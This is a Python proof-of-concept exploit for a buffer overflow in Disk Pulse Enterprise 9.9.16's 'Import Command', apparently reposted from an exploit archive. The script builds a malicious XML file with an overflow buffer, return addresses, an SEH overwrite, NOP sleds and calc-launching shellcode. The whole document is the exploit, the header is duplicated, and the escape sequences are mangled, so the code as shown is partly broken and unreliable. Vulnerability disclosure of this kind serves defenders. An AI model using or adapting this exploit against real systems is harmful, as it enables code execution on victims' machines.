#!/usr/bin/python
# Exploit Title : Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : an #!/usr/bin/python
# Exploit Title : Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
# Tested Version : 9.9.16
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml and then open disk pulse software , right click and click on import command . Select pyramid.xml file .
import os,struct
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)
#NOPS
nops = "x90"
#LEA EAX, [ESP+76]
esp = "x8Dx44x24x4c"
#JMP ESP
jmp2 = "xFFxE0"
#JMP Short
nseh = "x90x90xEBx05" #Jump short 5
#POP POP RET (libspp.dll)
seh = struct.pack('<L',0x10015FFE)
#CALC.EXE
shellcode = "x31xdbx64x8bx7bx30x8bx7fx0cx8bx7fx1cx8bx47x08x8bx77x20x8bx3fx80x7ex0cx33x75xf2x89xc7x03x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x89xddx8bx34xafx01xc6x45x81x3ex43x72x65x61x75xf2x81x7ex08x6fx63x65x73x75xe9x8bx7ax24x01xc7x66x8bx2cx6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x89xd9xb1xffx53xe2xfdx68x63x61x6cx63x89xe2x52x52x53x53x53x53x53x53x52x53xffxd7"
# FINAL PAYLOAD
evil = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 64 + nseh + seh + nops * 10 + shellcode
#FILE
file='<?xml version="1.0" encoding="UTF-8"?>
<classify
name='' + evil + '
</classify>'
f = open('pyramid.xml', 'w')
f.write(file)
f.close()
Disk Pulse Enterprise 9.9.16 Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 477